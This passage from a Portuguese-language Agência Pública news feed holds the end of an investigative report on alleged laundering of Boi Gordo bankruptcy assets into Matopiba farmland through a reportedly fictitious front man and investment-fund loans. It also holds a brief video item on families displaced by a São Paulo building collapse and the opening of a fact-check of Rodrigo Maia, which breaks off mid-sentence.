é uma pessoa de carne e osso, ou apenas uma pessoa de papel, um fantasma que movimentou quase R$ 1 bilhão em bens e dinheiro. Uma<a href="https://apublica.org/wp-content/uploads/2018/06/Jucesp_ICGL2.pdf" target="_blank" rel="noopener"> denúncia feita em 2015</a> pela procuradora da Fazenda Marina Tomaz Kalinic Dutra levantou fortes suspeitas quanto à existência de Rosa. “A Receita Federal do Brasil realizou fiscalização relativamente ao Imposto de Renda de PAULO ROBERTO DA ROSA […], quanto aos anos calendário 2008 e 2009 e acabou constatando tratar-se de ‘pessoa fictícia’”, relata Marina.<!-- alsoRead --></p><p>A Receita Federal constatou que não havia nenhum registro de nascimento com o nome e filiação correspondente a Paulo Roberto da Rosa no cartório da comarca de Canutama (AM), onde os documentos de Rosa atestam que sua certidão foi registrada. Rosa também não possui cadastro na Justiça Eleitoral, só foi ter CPF em 1999, aos 36 anos, e o assento de sua certidão de nascimento foi lavrado em 1995, ou seja, quando ele tinha 29 anos. Uma perícia em um cheque assinado por Rosa apontou indícios de a assinatura dele ser, na verdade, de um contador do Grupo Golin, Gerson Luiz Oliveira. Como era de esperar, ele nunca compareceu para prestar depoimento nas ações judiciais a que responde.</p><p>O tal Rosa desempenhou importante papel no desvio de bens da Boi Gordo, segundo as investigações. Alçado a diretor-presidente da empresa após Julio Lourenço Golin assumir a presidência do Conselho de Administração da Boi Gordo, Rosa assinou vários dos arrendamentos das fazendas pertencentes à massa falida. Do outro lado do balcão, como arrendador, Joselito assinava pela Eldorado Industrial, como comprovam documentos das fazendas Realeza, do sítio Atlas e do Bairro do Porto. “Eleito presidente das Fazendas Reunidas Boi Gordo, fora Paulo Roberto da Rosa que celebrou os contratos de arrendamento, sem qualquer pagamento, dos principais ativos da Boi Gordo com a Eldorado”, diz o juiz Sacramone em decisão judicial.</p><p>Segundo a denúncia, o valor equivalente aos bens desviados foi enviado ao exterior pelo Grupo Golin por meio de uma complexa trama financeira. Validada pelo MP, a denúncia entendeu que, para trazer os recursos de volta ao Brasil, entrou em cena um grande fundo de investimentos, o Vision Brazil Investments. O Vision foi criado por dois nomes relevantes do mercado financeiro nacional: Amaury Fonseca Júnior, ex-diretor e head trader de instituições como Bank of America e JP Morgan no Brasil, e Fábio Greco, ex-responsável pela área de derivativos do Bank of America no Brasil e do Banco Patrimônio (subsidiária brasileira do extinto banco de investimentos Salomon Brothers), com passagem de seis anos pelo Chase Manhattan Bank.</p><p>Uma série de operações suspeitas foi descoberta nos trabalhos de investigação. Nos contratos de mútuo – acordos de empréstimo firmados entre particulares em torno de bens móveis –, os polos eram sempre os mesmos: de um lado, representantes do Grupo Golin e, de outro, subsidiárias do fundo Vision Brazil Investments, como a ICGL Empreendimentos e Participações S.A., ICGL 2 Empreendimentos e Participações Ltda., AGK 4 Empreendimentos e Participações Ltda. e AGK5 Empreendimentos e Participações Ltda. Nos documentos da Jucesp, há uma série de transferências de recursos a essas empresas pelas companhias registradas em locais considerados paraísos fiscais, como, por exemplo, o estado de Delaware, nos Estados Unidos.</p> <figure id="attachment_47949" aria-describedby="figcaption_attachment_47949" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>José Cícero da Silva/Agência Pública</div><img itemprop="contentURL" class="wp-image-47949 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-107.jpg" alt="" width="1920" height="1280" srcset="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-107.jpg 1920w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-107-800x533.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-107-1600x1067.jpg 1600w" sizes="(max-width: 1920px) 100vw, 1920px" /></div><figcaption id="figcaption_attachment_47949" class="wp-caption-text caption" itemprop="description">Plantação de soja na região do Matopiba. Região despertou o interesse do fundo Vision Brazil</figcaption></figure><p>Esses contratos eram firmados pelas empresas do Grupo Vision, que ofertavam um valor em dinheiro aos representantes do Grupo Golin em troca do compromisso de pagamento por meio de propriedades rurais. Uma espécie de contrato de corretagem de imóveis para a Vision, que, fundada em 2006, queria <a href="https://apublica.org/2018/05/terra-a-vista-no-matopiba" target="_blank" rel="noopener">investir em terras</a> no cerrado brasileiro, seguindo as tendências do mercado financeiro mundial. Esses imóveis eram adquiridos por valores significativamente mais baixos do que os empréstimos oferecidos pelas subsidiárias do Grupo Vision, trazendo lucros astronômicos para o Grupo Golin, sempre próximos aos 1.000%. Foi também através dessas operações que as subsidiárias do Grupo Vision adquiriram terras no coração do Matopiba. Entre elas estão dois grandes imóveis rurais – fazendas Piauí e Terçado – formados pela Vision no cerrado piauiense, que reúne 1,5 milhão de hectares de terra arável nos <a href="https://apublica.org/2018/05/nos-baixoes-do-piaui-paga-se-o-preco-do-progresso-do-matopiba/" target="_blank" rel="noopener">platôs das muitas chapadas ao sul</a> do estado. Juntos, os imóveis somam 47.247 hectares – área quase equivalente à cidade de Porto Alegre – em municípios como Manoel Emídio, Alvorada do Gurgueia, Palmeira do Piauí e Currais. <a href="http://www.visionbrazil.com/produtos.html#tab-tab2" target="_blank" rel="noopener">Em seu site</a>, a Vision afirma possuir 335 mil hectares no Matopiba e afirma ter criado uma empresa – a Tiba Agro – só para gerenciar projetos agrícolas no cerrado.</p><p>Um exemplo das operações de mútuo está na aquisição das fazendas Brejo da Onça II e Olho D’Água, localizadas em Alvorada do Gurgueia (PI). Segundo a denúncia da OAR, os imóveis rurais, oficialmente comprados por R$ 100 mil cada um, foram dados em pagamento a dois contratos de mútuo firmados pelo suposto fantasma Paulo Roberto da Rosa com a ICGL, subsidiária do Grupo Vision, que, somados valiam R$ 7,6 milhões. Um lucro gigantesco sobre o valor original das terras que nem sequer foram pagas à vendedora.<!-- mostRead --></p><p><a id="Link2"></a>As áreas foram compradas pelo Grupo Golin, em março de 2008, da advogada Josyane Rocha da Silva. “Eu tinha essas terras aqui no sul do estado, estava passando por um momento muito difícil e tinha o interesse em vendê-las. O Grupo Golin mostrou interesse em comprar. Eu tive pessoalmente com o Joselito Golin, que é conhecido como Paulo Golin, e ele me transmitiu uma confiança, mas na verdade eu caí numa teia de aranha”, conta Josyane. Ela conta que fez um acordo com Golin pelas áreas que, juntas, ultrapassam 4.700 hectares, mas recebeu apenas um pagamento como sinal. Confiando no negócio, ela conta que assinou a escritura transferindo as terras para um técnico em contabilidade ligado ao Grupo Golin chamado Ronaldo Lisboa de Freitas. Este transferiu as áreas a Paulo Roberto da Rosa, que, por meio de seu procurador, Joselito Golin, repassou-as à ICGL, conforme as cadeias dominiais dos imóveis obtidas pela <strong>Pública</strong>. Como os pagamentos não vieram, a advogada Josyane devolveu o sinal e obteve a reintegração de posse das duas fazendas por meio de uma decisão liminar da Justiça piauiense. “Durante a negociação, o Paulo Golin falou que ia telefonar para a Tiba Agro [do fundo de investimentos Vision] para receber o dinheiro da transação. Eles pareciam ser parte do mesmo grupo”, relata a advogada, revelando a proximidade entre o grupo de agronegócio e o fundo de investimento. O Instituto de Terras do Piauí (Interpi) move uma ação de reintegração de posse na Justiça do estado por entender que a área comprada pela Vision é pública – o processo corre na Justiça desde 2012 e ainda não há conclusão.</p><p>Segundo a denúncia, o mesmo estratagema foi usado nos acordos de mútuo envolvendo várias outras fazendas. Só em 2007, por exemplo, Paulo Rosa adquiriu nove fazendas (Chapadão, Cabeceira, Engano, Terçado, Última Fronteira II, Alto da Serra, Alto da Curriola, Ipanema e Serra), todas no Piauí. Os imóveis foram dados como pagamento a mútuos que, somados, chegam a R$ 60 milhões, recebidos por Rosa em um período de cinco meses. Em muitos desses imóveis, Rosa – sempre representado por Joselito Golin – teve lucros próximos a 1.000%. A fazenda Cabeceira, por exemplo, formada a partir da compra de seis matrículas imobiliárias por R$ 437.400,00, foi dada como pagamento a um mútuo de R$ 4,62 milhões. Ou seja, descontados os pouco mais de R$ 430 mil que pagou pelas matrículas, Rosa ficou com um lucro de R$ 4,18 milhões – cerca de 9,6 vezes o que investiu. A fazenda Engano foi comprada por R$ 250.000,00 e dada como pagamento a um mútuo de R$ 2,6 milhões – lucro de 957% no mesmo período de sete meses. Também a fazenda Pirajazinho II, comprada em setembro de 2007 por R$ 900.000,00, foi dada em pagamento a um mútuo de R$ 9.520.070,39 em abril de 2008 – lucro de 958% nos mesmos sete meses. Todos esses mútuos foram ofertados por duas subsidiárias da Vision Brazil: ICGL e ICGL 2.</p> <figure id="attachment_47957" aria-describedby="figcaption_attachment_47957" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><img itemprop="contentURL" class="wp-image-47957 size-full" src="https://apublica.org/wp-content/uploads/2018/06/eronides.jpg" alt="" width="768" height="463" /></div><figcaption id="figcaption_attachment_47957" class="wp-caption-text caption" itemprop="description">“Identificamos esse dinheiro desviado da Boi Gordo voltando do exterior para o Brasil, na forma de empréstimos, através de fundos de investimento”, afirma o promotor Eronides Santos (à direita), do MP (SP)</figcaption></figure><p>“Nós identificamos esse dinheiro desviado da Boi Gordo voltando do exterior para o Brasil, na forma de empréstimos, através de fundos de investimento por meio de um laranja, o Paulo Roberto da Rosa, sempre por meio de um procurador, o Paulo Golin, cujo nome de batismo na verdade é Joselito”, descreve o promotor Eronides Santos. “Esse Paulo Roberto da Rosa movimentou R$ 1 bilhão, sempre através do Golin como procurador”, resume. Em juízo, a Vision Brazil reconheceu que firmou os contratos de mútuo que visavam investimentos no setor agropecuário. A Vision alegou ter sido apresentada a Paulo Golin e a Paulo Roberto da Rosa, “empresário bem-sucedido na aquisição, exploração e venda de grandes propriedades rurais”. O valor dos empréstimos, segundo a empresa, era definido por avaliações de mercado preestabelecidas e que não tinham controle sobre o valor que os mutuários – na maioria das vezes, Rosa e o contador Gerson Luiz Oliveira – pagavam pelas fazendas dadas posteriormente em pagamento.</p><p>O juiz Marcelo Sacramone recusou os argumentos da Vision. “Os documentos juntados aos autos demonstram que as operações não foram regulares. O montante emprestado não é condizente com a situação financeira de Paulo Roberto da Rosa, não é condizente à prática do mercado, a operação não é lógica economicamente e implica risco exacerbado ao agente, a menos que haja interesses outros”, decidiu o juiz. “Ainda que a parte ré sustente que o lucro obtido com a compra e venda dos imóveis era algo que cabia ao mutuário Paulo Roberto da Rosa e que ela não tinha interferência, a alegação não é crível. Como agente econômico, que procurava maximizar seu lucro, a parte ré não continuaria a deixar de auferir 90% de lucro pelas aquisições das terras, ou seja, não deixaria de comprar diretamente os bens no mercado para não ter que pagar estratosférico percentual de lucro”, argumenta Sacramone.</p><p>Para o magistrado, a única explicação lógica para o fato de a Vision oferecer contratos de mútuo tão generosos a Paulo Roberto da Rosa e outras pessoas do Grupo Golin é “conceber-se que o capital emprestado não é do mutuante [Vision], mas do próprio mutuário [Golin] e a operação fora realizada simplesmente para legalizar os recursos obtidos mediante desvio dos bens da anterior concordatária”. A Vision negou a afirmação dizendo que o dinheiro era da própria empresa e teve origem em fundos geridos pela empresa nas Ilhas Cayman. “Essa alegação, contudo, é insuficiente. Cumpria à parte ré demonstrar efetivamente a origem do capital e que, no caso, não tinha origem no Grupo Golin. Referida demonstração não fora realizada a contento nos autos e sem quaisquer justificativas, o que indica a participação na operação de desvio dos recursos em benefício do Grupo Golin e em benefício próprio, já que conservou consigo a propriedade das fazendas dadas em pagamento”, decidiu Sacramone.</p><p><a href="https://www.jusbrasil.com.br/diarios/188671453/djsp-judicial-1a-instancia-capital-03-05-2018-pg-1261?ref=next_button" target="_blank" rel="noopener">Em segunda instância</a>, contudo, a Vision obteve <a href="https://apublica.org/wp-content/uploads/2018/06/Voto-Apelação-nº-0026864-81.2014.8.26.pdf" target="_blank" rel="noopener">decisão favorável</a> a uma alegação de cerceamento da defesa e conseguiu anular os efeitos da decisão do juiz Sacramone em relação às subsidiárias da Vision. O processo retornou à primeira instância para que a empresa possa produzir provas de que o dinheiro dos mútuos não tinha relação com o Grupo Golin e, consequentemente, com a fraude à falência da Boi Gordo. A empresa alega que o dinheiro dos mútuos veio de investidores internacionais reunidos nos fundos geridos por ela.</p><p>Na esfera federal, a Receita também viu irregularidades nos negócios entre as subsidiárias da Vision e Paulo Roberto da Rosa, classificados como “evidente fraude para o não pagamento de impostos” por Golin. “Conclui-se, portanto, estar claramente comprovado que JOSELITO GOLIN, com a ajuda de empresas a ele ligadas, utilizou-se de personagem fictício para celebrar negócios e fraudar o fisco”, diz denúncia do MPF. Em dezembro de 2015, a juíza federal Carolina Viegas <a href="https://apublica.org/wp-content/uploads/2018/06/Jucesp_ICGL2.pdf" target="_blank" rel="noopener">determinou</a> a indisponibilidade dos bens de Golin e das subsidiárias da Vision envolvidas nos mútuos.</p><p>Em contato com a <strong>Pública</strong>, a Vision Brazil Investments declarou que “as suspeitas levantadas pelo síndico da Massa Falida das Fazendas Reunidas Boi Gordo em relação aos negócios realizados pelas Empresas foram todas afastadas, no incidente, por provas robustas que demonstram terem sido os imóveis adquiridos de forma idônea pelas Empresas, mediante operações comerciais lícitas, todas assistidas por prestigioso escritório de advocacia, auditadas por empresas de renome e devidamente escrituradas”. Alegou também que em segunda instância viu “nítida separação entre os negócios dessas Empresas e os atos praticados pelas pessoas que administraram a massa falida (denominado ‘grupo Golin’). Logo, o acórdão do Tribunal de Justiça evidenciou que não havia fundamento que sustentasse qualquer envolvimento dessas empresas com eventuais atos e desvios alegadamente praticados pelo grupo Golin no âmbito da falência das Fazendas Reunidas Boi Gordo”. A empresa destacou o fato de o processo ter sido remetido à primeira instância para melhor apreciação das provas sobre a participação da Vision no desvio de recursos da Boi Gordo. E declarou “que a idoneidade das operações por elas empreendidas foi atestada pela [empresa de auditoria] PwC em substancioso laudo pericial, produzido ao longo de mais de 1 (um) ano de diligências, já apresentado judicialmente e a ser considerado pelo juízo de primeiro grau por determinação do Tribunal de Justiça de São Paulo”. As empresas do grupo são representadas pelo ex-presidente do STF Cezar Peluso.</p><p>A Vision permanece com muitas das fazendas adquiridas nas cobiçadas áreas de cerrado com a lucrativa corretagem do suposto fantasma Paulo Roberto da Rosa e o contador dos Golin, o também condenado Gerson Luiz Oliveira. Em seus investimentos em terras, a Vision é especializada em adquirir terra bruta e transformá-la para revender a produtores e especuladores interessados. Segundo uma apresentação de um dos sócios da Vision Brazil produzida para investidores em 2016, a empresa adquiriu, no fim de 2007, um imóvel rural de 25 mil hectares por R$ 41,4 milhões e o revendeu por R$ 87,9 milhões.</p><p>Apesar de anular os efeitos da sentença em relação à Vision Brazil por cerceamento de defesa (sem análise do mérito), a participação do Grupo Golin foi completamente confirmada em segunda instância pelo Tribunal de Justiça de São Paulo.</p><h3>Lucro dos mútuos estacionou na compra de fazendas, diz MP</h3><p>Os beneficiários dos mútuos realizados pela Vision Brazil usaram os lucros dos contratos para integralizar capital de outras empresas. Uma delas foi a Bom Jardim Empreendimentos Rurais Ltda. A empresa teve seu capital consideravelmente ampliado em menos de 40 dias em 2009: saiu de R$ 100 mil para R$ 3,6 milhões com o lucro dos mútuos obtidos por Paulo Roberto da Rosa, segundo documentos da Jucesp. Em seguida, a Bom Jardim adquiriu uma fazenda rebatizada com o mesmo nome da empresa, um imóvel de 14 mil hectares na cobiçada serra do Quilombo, área rural disputada a tapa por gigantes do agronegócio, situada entre os municípios de Bom Jesus, Gilbués e Monte Alegre do Piauí. O imóvel encontra-se com a matrícula bloqueada após denúncia do MP do Piauí por inconformidades das matrículas dos imóveis com a <a href="http://www.planalto.gov.br/ccivil_03/leis/L6015compilada.htm" target="_blank" rel="noopener">Lei de Registros Públicos (6.015/1973)</a>. Na decisão de bloqueio, o juiz da vara agrária de Bom Jesus (PI), Heliomar Rios Ferreira, afirmou que as matrículas dos imóveis foram hipotecadas em uma transação de R$ 2,6 bilhões proveniente de uma das maiores companhias financeiras do mundo, a <a href="https://www.metlife.com/" target="_blank" rel="noopener">Metlife</a>, sediada em Nova York. Parte do empréstimo se destina à compra de novas fazendas.</p><p>Segundo o promotor Eronides Santos, do MP de São Paulo, a maior parte dos lucros dos mútuos realizados pelo Grupo Golin virou fazendas. “Nós começamos a monitorar e a verificar onde esse dinheiro foi estacionado. E foi na aquisição de propriedades rurais. Inúmeras propriedades rurais em nome de empresas e membros da família Golin”, descreve Santos. Outra fazenda adquirida com o capital proveniente dos mútuos, a fazenda Chapadão do São Domingos, localizada em Uruçuí (PI), foi adquirida em setembro de 2009 por R$ 5 milhões pela empresa JAP Empreendimentos e Participações. A JAP pertence a duas filhas de Joselito Golin: Judiliane e Ana Paula Golin. Dois meses depois da aquisição, a fazenda foi vendida à Empresa Brasileira de Terras 2 Ltda., representada pelos dois administradores da Vision, Fábio Greco e Amaury Fonseca Jr., por cerca de R$ 44 milhões.</p> <figure id="attachment_47945" aria-describedby="figcaption_attachment_47945" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>José Cícero da Silva/Agência Pública</div><img itemprop="contentURL" class="wp-image-47945 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-4.jpg" alt="" width="1920" height="1280" srcset="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-4.jpg 1920w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-4-800x533.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-4-1600x1067.jpg 1600w" sizes="(max-width: 1920px) 100vw, 1920px" /></div><figcaption id="figcaption_attachment_47945" class="wp-caption-text caption" itemprop="description">O grupo Golin responde a uma dezena de processos envolvendo questões fundiárias na vara agrária de Bom Jesus (PI), cujo titular é o juiz Heliomar Rios Ferreira (foto)</figcaption></figure><p>No Piauí, membros do Grupo Golin enfrentam uma série de acusações de serem beneficiários de grilagem de terras e autores de episódios de violência. Em 2016, Jocenir Pedro Golin foi denunciado pelo MP do Piauí por constar na cadeia dominial de uma matrícula grilada por um servidor do cartório da cidade de Gilbués (PI). O servidor em questão, por meio de manobras no cartório do município piauiense, transformou uma área de 6 mil braças, que seria equivalente a pouco mais de 8 mil hectares, em uma área de 51.315 hectares. A área foi posteriormente clonada no cartório de Barreiras do Piauí (PI), chegando a mais de 100 mil hectares criados na caneta.</p><p>“Antes pensava que somente Jesus Cristo fosse capaz de multiplicar os pães, mas aqui no Piauí nós temos uma figura que tem o poder divino de multiplicar terras. Não há poder maior do que esse!!! Jesus Cristo deve estar com muita inveja ou, pelo menos, lamentando não ter vivido para ver tal proeza, pois, em sendo na sua época, teria resolvido o problema dos hebreus e Moisés não ficaria vagando anos pelo deserto à procura de um mísero pedaço de chão para alocar seu povo!!!”, escreveu o juiz Heliomar Rios Ferreira na inflamada decisão que determinou o bloqueio das matrículas decorrentes da manobra. Jocenir Pedro Golin era um dos sócios da Forte Colonizadora, apontada como responsável direta pelo desvio de bens da Boi Gordo. O outro sócio da Forte, Júlio Lourenço Golin, também aparece como beneficiário da manobra do cartorário como sócio da empresa Vale Verde S/A. Esta e Jocenir Golin receberam cerca de 19 mil hectares da área criada em cartório e a venderam posteriormente a outro comprador. Golin foi denunciado pelo MPF por ter conseguido crédito bancário com a terra de mentira. O cartório de Gilbués, assim como muitos outros do sul piauiense, encontra-se sob intervenção judicial.</p><h3>Outro lado</h3><p>O advogado Leandro Tilkian, que representa três empresas do Grupo Golin citadas na reportagem (Eldorado Agroindustrial, Bom Jardim Empreendimentos Rurais e JAP Empreendimentos e Participações), assim como o patriarca Joselito Golin, suas filhas Ana Paula, Rafaela e Judiliane, disse não querer se manifestar até o julgamento dos embargos de declaração da decisão de segunda instância, que ocorrerá no próximo dia 26 de junho. A advogada Tânia Maiuri, que representa Paulo Roberto da Rosa, disse não ter sido autorizada por seu cliente a prestar esclarecimentos à reportagem. O advogado Isidoro Mazzotini, que representa o contador Gerson Luís Oliveira, não respondeu às questões enviadas até o fechamento da reportagem.</p><p>Roberto Iser Júnior, que representa Júlio Lourenço Golin e a empresa Forte Colonizadora, enviou à reportagem um laudo pericial feito pela empresa de auditoria <a href="http://www.concept.net.br/" target="_blank" rel="noopener">Concept</a> nas contas da Boi Gordo. O laudo afirma que o valor apontado como desviado na sentença de primeira instância “não possui respaldo técnico formal e material, posto que, conforme demonstrado e fundamentado neste trabalho, a quase totalidade dos ativos foi vendida e transferida antes da data de aquisição pela Forte Colonizadora Ltda. (30/set./03) ou foi arrecadada pelo síndico da massa falida”. “Não existe uma prova de algum bem que estivesse em nome da Boi Gordo que tenha sido transferido para Júlio Golin, para a Forte Colonizadora ou para qualquer um dos outros réus arrolados como integrantes do Grupo Golin. O acórdão fala que está comprovado, mas não mostra onde. Isso que nós vamos argumentar no julgamento dos embargos”, afirma Roberto Iser Júnior. Ele refuta também a caracterização das empresas e familiares de Joselito Golin como grupo econômico.</p><p>A reportagem não conseguiu contato com a defesa de Paulo Roberto de Andrade.</p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/investigacao-indica-que-dinheiro-dos-credores-da-boi-gordo-virou-terra-em-matopiba/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Depois que o fogo apaga</title><link>https://apublica.org/2018/06/depois-que-o-fogo-apaga/</link> <comments>https://apublica.org/2018/06/depois-que-o-fogo-apaga/#respond</comments> <pubDate>Mon, 18 Jun 2018 15:01:04 +0000</pubDate> <dc:creator><![CDATA[Caio Castor]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[auxílio-moradia]]></category> <category><![CDATA[direito a moradia]]></category> <category><![CDATA[Ocupações]]></category> <category><![CDATA[São Paulo]]></category><guid isPermaLink="false">http://apublica.org/?post_type=video&p=47910</guid> <description><![CDATA[Nossa reportagem registrou a saga de duas famílias em busca de moradia após o incêndio e desabamento do edifício Wilton Paes no centro de São Paulo ]]></description> <content:encoded><![CDATA[<p>Durante 45 dias acompanhamos o dia a dia de Noemi, Adilson, Grivalda e Jéssica no acampamento que se levantou em frente aos escombros do edifício Wilton Paes, no Largo do Paissandú, no Centro de São Paulo.</p><p>Os quatro desabrigados são parte das mais de 150 famílias que ficaram sem-teto com o incêndio e desabamento do edifício ocupado pelo movimento LMD (Luta por Moradia Digna) na madrugada de terça-feira, 1 de maio de 2018.</p><p>Depois de 23 dias acampadas e à espera de uma solução do poder público – que ainda não veio – Noemi e a filha Jéssica buscaram abrigo em outra ocupação no centro da cidade. Adilson e a esposa Grivalda, porém, resolveram seguir acampados em condições insalubres.</p><p>Na cidade mais rica do país, esses personagens escancaram as dificuldades cruéis de uma parcela cada vez maior da população na luta por moradia digna.</p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/depois-que-o-fogo-apaga/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Rodrigo Maia usa dados sem contexto sobre educação</title><link>https://apublica.org/2018/06/truco-rodrigo-maia-usa-dados-sem-contexto-sobre-educacao/</link> <comments>https://apublica.org/2018/06/truco-rodrigo-maia-usa-dados-sem-contexto-sobre-educacao/#respond</comments> <pubDate>Fri, 15 Jun 2018 18:47:35 +0000</pubDate> <dc:creator><![CDATA[Ethel Rudnitzki]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[checagem]]></category> <category><![CDATA[DEM]]></category> <category><![CDATA[educação]]></category> <category><![CDATA[fact-checking]]></category> <category><![CDATA[Rodrigo Maia]]></category> <category><![CDATA[Truco]]></category> <category><![CDATA[Truco Eleições 2018]]></category><guid isPermaLink="false">http://apublica.org/?post_type=claim_review&p=47898</guid> <description><![CDATA[Presidenciável acerta número sobre pessoas em pobreza extrema no Nordeste, mas erra quantidade de crianças em creches]]></description> <content:encoded><![CDATA[<figure id="attachment_47897" aria-describedby="figcaption_attachment_47897" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>J.Batista/Câmara dos Deputados</div><img itemprop="contentURL" class="size-full wp-image-47897" src="https://apublica.org/wp-content/uploads/2018/06/rodrigo-maia-checagem.jpg" alt="" width="1972" height="1312" srcset="https://apublica.org/wp-content/uploads/2018/06/rodrigo-maia-checagem.jpg 1972w, https://apublica.org/wp-content/uploads/2018/06/rodrigo-maia-checagem-800x532.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/rodrigo-maia-checagem-1600x1065.jpg 1600w" sizes="(max-width: 1972px) 100vw, 1972px" /></div><figcaption id="figcaption_attachment_47897" class="wp-caption-text caption" itemprop="description">O presidente da Câmara. Rodrigo Maia (DEM), quer entrar na disputa pela Presidência da República</figcaption></figure><p>Presidente da Câmara dos Deputados desde julho de 2016, Rodrigo Maia (DEM) ganhou notoriedade desde o impeachment de Dilma Rousseff. Com a posse de Temer, que não possui vice, o parlamentar tornou-se o primeiro nome na linha sucessória para a Presidência da República. Recentemente Maia teve o nome anunciado como pré-candidato do Democratas para as eleições presidenciais, <a href="https://politica.estadao.com.br/noticias/eleicoes,maia-diz-que-ainda-ha-tempo-para-decidir-se-desiste-de-candidatura,70002338316">mas, como tem atingido 1% nas pesquisas, já há sinais de que pode desistir</a>. Sua assessoria, por enquanto, nega a informação.</p><p>Ainda que faça parte da base aliada de Temer, o parlamentar adotou um discurso de oposição em suas entrevistas como presidenciável, posicionando-se contra o Planalto em temas como precificação de combustíveis e criticando a organização e a burocracia da intervenção federal no Rio de Janeiro. Em 6 de junho, ele participou de uma <a href="https://www.facebook.com/correiobraziliense/videos/1873381419374846/">sabatina com pré-candidatos ao Planalto realizada pelo jornal <em>Correio Braziliense</em></a>. Apesar de se dizer ser contra privatizações, Maia dedicou boa parte de seu tempo para criticar o peso do Estado no orçamento federal. Além de educação básica e ensino superior, o pré-candidato também falou sobre saúde e desigualdade social, sempre defendendo reformas estruturais.</p><p>O <strong><a href="https://apublica.org/truco">Truco</a></strong> – projeto de fact-checking da <a href="https://apublica.org/"><strong>Agência Pública</strong></a>, que está analisando frases de todos os pré-candidatos à Presidência – verificou quatro trechos da entrevista. Apoiado em estudos e pesquisas, ele acertou um dado sobre desigualdade no país, mas deixou de lado o contexto em dois números corretos sobre o ensino superior. O pré-candidato também errou o porcentual de crianças em creches no Brasil.</p><p><strong>Leia mais:</strong><br /> <strong><a href="https://apublica.org/2018/06/truco-aldo-rebelo-usa-dados-falsos-sobre-golpe-de-64-copa-e-amazonia/">Aldo Rebelo usa dados falsos sobre golpe de 64, Copa e Amazônia</a></strong><br /> <strong><a href="https://apublica.org/2018/05/truco-manuela-davila-erra-dados-sobre-seguranca-publica/">Manuela D’Ávila erra dados sobre segurança pública</a></strong><br /> <strong><a href="https://apublica.org/2018/05/truco-em-artigo-escrito-da-prisao-lula-distorce-dados/">Em artigo escrito da prisão, Lula distorce dados</a></strong></p><hr /><p><strong><a id="checagem1"></a>“[O Brasil é] um país desigual, onde 55% das pessoas que estão na extrema pobreza estão no Nordeste.”</strong></p><p><img class="size-full wp-image-30361 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/verdadeiro-400.jpg" alt="Verdadeiro" width="400" height="400" />A afirmação de Rodrigo Maia é verdadeira. Em reportagem publicada no dia 12 de março de 2018, o <em>Valor Econômico</em> divulgou o resultado de um relatório encomendado à LCA Consultores sobre esse tema. O estudo <a href="http://www.valor.com.br/brasil/5446455/pobreza-extrema-aumenta-11-e-atinge-148-milhoes-de-pessoas">identificou um crescimento de 11,2% no número de pessoas em situação de extrema pobreza no país em 2017</a>. O Nordeste concentrava 55% deste grupo, cerca de 8,1 milhões de pessoas. O Sudeste e o Norte apresentaram o mesmo porcentual, com 13% do total para cada região. A análise baseou-se em microdados da Pesquisa Nacional por Amostra de Domicílios (Pnad) Contínua, elaborada pelo Instituto Brasileiro de Geografia e Estatística (IBGE).</p><p>A consultoria adotou a linha de corte do Banco Mundial para países de nível médio-alto de desenvolvimento, que corresponde a cerca de R$ 136 mensais, em valores de 2017. A partir dessa metodologia, descobriu que a população em extrema pobreza passou de 13,34 milhões, em 2016, para 14,83 milhões, no ano passado. O documento da LCA Consultores não está disponível e, apesar de ter sido solicitado à empresa pelo <strong>Truco</strong>, não foi fornecido.</p><p><a href="https://biblioteca.ibge.gov.br/visualizacao/livros/liv101459.pdf">No Brasil, não há uma linha oficial de pobreza</a>, mas, mesmo utilizando procedimentos diferentes de mensuração da renda da população, os dados permanecem similares. O Instituto de Pesquisa e Estratégia Econômica do Ceará (Ipece) lançou no dia 22 de maio <a href="http://www.ipece.ce.gov.br/enfoque/EnfoqueEconomicoN187_22_05_2018.pdf">um levantamento sobre o total das pessoas em extrema pobreza no Brasil a partir dos microdados da Pnad Contínua.</a> A metodologia seguiu os parâmetros do programa Bolsa Família, que considera extremamente pobres as pessoas com rendimento domiciliar per capita menor ou igual a R$ 85. Segundo a pesquisa, no ano passado, o Nordeste concentrava cerca de 52% da extrema pobreza do país. Entre 2016 e 2017, houve um aumento de 13,95%, ou seja, o número de pessoas nessa condição passou de 8,7 milhões para 10,1 milhões.</p><hr /><p><strong><a id="checagem2"></a>“De 0 a 3 anos é dramático você ter apenas 25% de crianças em creches no Brasil.”</strong></p><p><img class="size-full wp-image-30306 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/falso-400.jpg" alt="Falso" width="400" height="400" />Ainda há um grande porcentual de crianças sem acesso a creches no Brasil, mas o dado usado pelo presidenciável está errado. Crianças de até 3 anos têm direito à educação infantil em creches ou entidades equivalentes garantido pela <a href="http://www.planalto.gov.br/ccivil_03/leis/L9394.htm">Lei de Diretrizes e Bases da Educação (LDB)</a> e pelo <a href="http://www.planalto.gov.br/ccivil_03/leis/L8069.htm">Estatuto da Criança e do Adolescente</a>. Mesmo assim, isso ainda não é realidade para muitas delas. De acordo com a Pnad Contínua, do IBGE, que traz o número mais recente sobre esse tema, <a href="https://biblioteca.ibge.gov.br/visualizacao/livros/liv101576_informativo.pdf">32,7% das crianças nessa faixa 